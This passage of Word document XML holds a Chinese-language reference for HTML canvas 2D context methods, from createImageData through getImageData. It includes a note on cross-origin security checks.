        <w:t>总是将子路径当做闭合的来处理，所以，只有在想为一条封闭路径描边（通过</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>）时才需要显式调用</w:t>
      </w:r>
      <w:r>
        <w:t>closePath()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ImageData createImageData(ImageData imagedata)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个和传入的</w:t>
      </w:r>
      <w:r>
        <w:t>imagedata</w:t>
      </w:r>
      <w:r>
        <w:t>尺寸相同的新的</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ImageData createImageData(double w,double h)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个指定宽度和高度</w:t>
      </w:r>
      <w:r>
        <w:t>的新</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这个新</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的所有像素都初始化为透明黑色（所有颜色和</w:t>
      </w:r>
      <w:r>
        <w:t>alpha</w:t>
      </w:r>
      <w:r>
        <w:t>值都为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>定义图片的尺寸，单位为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素。在实际实现中，允许一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素映射到多个底层设备的像素。返回的</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定设备像素的图像尺寸，这两个值与参数</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>可能不一致。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CanvasGradient createLinearGradient(double x0,y0,x1,y1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法生成并返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>对象，</w:t>
      </w:r>
      <w:r>
        <w:t>其中颜色从起点</w:t>
      </w:r>
      <w:r>
        <w:t>(x0,y0)</w:t>
      </w:r>
      <w:r>
        <w:t>到终点</w:t>
      </w:r>
      <w:r>
        <w:t>(x1,y1)</w:t>
      </w:r>
      <w:r>
        <w:t>之间线性渐变。注意，这个方法并没有指定渐变的颜色，如果要指定颜色，使用它返回对象的</w:t>
      </w:r>
      <w:r>
        <w:t>addColorStop()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。如要绘制渐变描边或填充区域，只须将一个</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>对象赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CanvasPattern createPattern(Element image,string repetition)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法生成并返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:r>
        <w:t>对象，这个对象表示由一幅平铺图像定义的图案。参数</w:t>
      </w:r>
      <w:r>
        <w:t>im</w:t>
      </w:r>
      <w:r>
        <w:t>age</w:t>
      </w:r>
      <w:r>
        <w:t>必须是一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，包含图案中要使用的图像。参数</w:t>
      </w:r>
      <w:r>
        <w:t>repetition</w:t>
      </w:r>
      <w:r>
        <w:t>定义图片如何平铺。可能的值有：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251750400" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4114800" cy="1052422"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="95" name="00095.jpeg" descr="000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5.jpeg" descr="00095.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4114800" cy="1052422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如要使用图案来描边或填充一个区域，可将</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:r>
        <w:t>对象作为</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CanvasGradient createRadialGradient(double x0,y0,r0,x1,y1,r1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法创建并返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>对象，其中颜色在两个指定的圆的圆周之间辐射渐变。注意，这</w:t>
      </w:r>
      <w:r>
        <w:t>个方法并没有指定渐变的颜色，如果要指定颜色，使用它返回对象的</w:t>
      </w:r>
      <w:r>
        <w:t>addColorStop()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。如要绘制渐变描边或填充区域，只须将一个</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>对象赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>辐射渐变的渲染方式如下：在第一个圆的圆周处颜色偏移量为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，在第二个圆周处颜色偏移量为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，两个圆之间为渐变的中间色。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void drawImage(Element image,double dx,dy,[dw,dh])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>复制指定</w:t>
      </w:r>
      <w:r>
        <w:t>image</w:t>
      </w:r>
      <w:r>
        <w:t>（这幅图像必须是一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>vi</w:t>
      </w:r>
      <w:r>
        <w:t>deo</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素）到画布中，图像的左上角位置为</w:t>
      </w:r>
      <w:r>
        <w:t>(dx,dy)</w:t>
      </w:r>
      <w:r>
        <w:t>。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>dw</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>dh</w:t>
      </w:r>
      <w:r>
        <w:t>，图像的宽度和高度会缩放到</w:t>
      </w:r>
      <w:r>
        <w:t>dw</w:t>
      </w:r>
      <w:r>
        <w:t>像素宽和</w:t>
      </w:r>
      <w:r>
        <w:t>dh</w:t>
      </w:r>
      <w:r>
        <w:t>像素高。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void drawImage(Element image,double sx,sy,sw,sh,dx,dy,dw,dh)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个版本的</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法复制指定</w:t>
      </w:r>
      <w:r>
        <w:t>image</w:t>
      </w:r>
      <w:r>
        <w:t>的一个源矩形区域的内容到画布的目标矩形区域。</w:t>
      </w:r>
      <w:r>
        <w:t>image</w:t>
      </w:r>
      <w:r>
        <w:t>必须是一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
      <w:r>
        <w:t>(sx,sy)</w:t>
      </w:r>
      <w:r>
        <w:t>定义图像的源矩形区域的左上角，</w:t>
      </w:r>
      <w:r>
        <w:t>sw</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t>定义源矩形区域的宽度和高度。注意这些参数</w:t>
      </w:r>
      <w:r>
        <w:t>的单位为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素并和画布的变换无关。其余的参数指定图像要复制到的目标矩</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>形区域：细节可参考</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个参数版的</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>。注意目标矩形区域的参数会根据当前转换矩形转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void fill()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>方法使用</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义的颜色、渐变或图案对当前路径进行填充。没有闭合的子路径在填充时将表现得如同调用过</w:t>
      </w:r>
      <w:r>
        <w:t>closePath()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样。（注意，这并不会让这些子路径真的闭合。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>填充一条路径并不会清除掉这条路径，在调用</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>之后，仍然可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>而不需重定义这条路径。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果路径与自身相交或者与子路径重叠，填充（使用</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>）画布将使用非零环绕规则来判断一个点是在路径的内部还是外部。这意味着，举例来说，如果你的路径定义了一个圆和正方形，正方形在圆的内部并且正方形的路径的绘制方向与圆的路径的绘制方向相反，那么正方形内部的点将在路径的外面，不会被填充。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void fillRect(double x,y,width,height)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fillRect()</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义的颜色、渐变或图案对指定的矩形进行填充。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>rect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不同，</w:t>
      </w:r>
      <w:r>
        <w:t>fillRect()</w:t>
      </w:r>
      <w:r>
        <w:t>对当前点和</w:t>
      </w:r>
      <w:r>
        <w:t>当前路径没有影响。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void fillText(string text,double x,y,[double maxWidth])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fillText()</w:t>
      </w:r>
      <w:r>
        <w:t>使用当前字体及</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性绘制</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>。参数</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>定义文本应该画在画布的什么位置，但这两个参数的实际值分别受到</w:t>
      </w:r>
      <w:r>
        <w:t>textAlign</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>textBaseline</w:t>
      </w:r>
      <w:r>
        <w:t>属性的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>textAlign</w:t>
      </w:r>
      <w:r>
        <w:t>的值为</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>（默认值）并且画布使用自左向右的文本排版（默认情况），或者如果</w:t>
      </w:r>
      <w:r>
        <w:t>textAlign</w:t>
      </w:r>
      <w:r>
        <w:t>的值为</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>并且画面使用自右向左的文本排版，文本将绘制</w:t>
      </w:r>
      <w:r>
        <w:t>在指定的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标的右边。如果</w:t>
      </w:r>
      <w:r>
        <w:t>textAlign</w:t>
      </w:r>
      <w:r>
        <w:t>的值为</w:t>
      </w:r>
      <w:r>
        <w:t>center</w:t>
      </w:r>
      <w:r>
        <w:t>，文本将在指定的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标处水平居中。在其他情况下（如果</w:t>
      </w:r>
      <w:r>
        <w:t>textAlign</w:t>
      </w:r>
      <w:r>
        <w:t>的值为</w:t>
      </w:r>
      <w:r>
        <w:t>"right"</w:t>
      </w:r>
      <w:r>
        <w:t>，或值为</w:t>
      </w:r>
      <w:r>
        <w:t>"end"</w:t>
      </w:r>
      <w:r>
        <w:t>同时画布使用自左向右的文本排版，或值为</w:t>
      </w:r>
      <w:r>
        <w:t>"start"</w:t>
      </w:r>
      <w:r>
        <w:t>同时画布使用自右向左的文本排版），文字将绘制在指定的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标的左边。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>textBaseline</w:t>
      </w:r>
      <w:r>
        <w:t>的值为</w:t>
      </w:r>
      <w:r>
        <w:t>"alphabetic"</w:t>
      </w:r>
      <w:r>
        <w:t>（默认值）、</w:t>
      </w:r>
      <w:r>
        <w:t>"bottom"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"ideographic"</w:t>
      </w:r>
      <w:r>
        <w:t>，大多数字形都将显示在指定的</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标上方。如果</w:t>
      </w:r>
      <w:r>
        <w:t>textBaseline</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>"center"</w:t>
      </w:r>
      <w:r>
        <w:t>，文本将在指定的</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标</w:t>
      </w:r>
      <w:r>
        <w:t>处大致和垂直居中。如果</w:t>
      </w:r>
      <w:r>
        <w:t>textBaseline</w:t>
      </w:r>
      <w:r>
        <w:t>的值为</w:t>
      </w:r>
      <w:r>
        <w:t>"top"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"hanging"</w:t>
      </w:r>
      <w:r>
        <w:t>，大多数字形都将显示在指定的</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标下方。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可选参数</w:t>
      </w:r>
      <w:r>
        <w:t>maxwidth</w:t>
      </w:r>
      <w:r>
        <w:t>定义文本的最大宽度。如果</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>的宽度有可能超过</w:t>
      </w:r>
      <w:r>
        <w:t>maxWidth</w:t>
      </w:r>
      <w:r>
        <w:t>，文本将使用更小或压缩版的字体来绘制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ImageData getImageData(double sx,sy,sw,sh)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法的参数为未转换的坐标，定义画布中的一个矩形区域，它将这个矩形区域的像素数据复制到一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象中并返回该对象。如何获取一个像素的红、绿、蓝分量以及</w:t>
      </w:r>
      <w:r>
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:t>pha</w:t>
      </w:r>
      <w:r>
        <w:t>分量请参考</w:t>
      </w:r>
      <w:r>
        <w:t>ImagData</w:t>
      </w:r>
      <w:r>
        <w:t>部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回像素的</w:t>
      </w:r>
      <w:r>
        <w:t>RGB</w:t>
      </w:r>
      <w:r>
        <w:t>颜色分量没有预乘</w:t>
      </w:r>
      <w:r>
        <w:t>alpha</w:t>
      </w:r>
      <w:r>
        <w:t>值。如果请求的矩形的某个区域在画布之外，</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象中这部分像素的值为透明黑色（全为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>）。如果该实现对于每一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>像素使用多个设备像素，则返回的</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性将与参数</w:t>
      </w:r>
      <w:r>
        <w:t>sw</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:t>不同。类似于</w:t>
      </w:r>
      <w:r>
        <w:t>Canvas.toDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>，这个方法也会进行安全检验，以避免跨域信息泄露。只有当画布是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>同源</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:t>getImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>才会返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象；否则，它将抛出一个错</w:t>
      </w:r>
      <w:r>
        <w:t>误。如果一张画布上包含一幅图片（直接用</w:t>
      </w:r>
      <w:r>
        <w:t>drawImage()</w:t>
      </w:r>
      <w:r>
        <w:t>或间接地通过</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:r>
        <w:t>绘制），并且这幅图片与包含当前画布的文档的源不同，则这张画布是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>非同源</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的。同样，如果画布上绘制的文字使用了来自不同源的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>字体，它是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
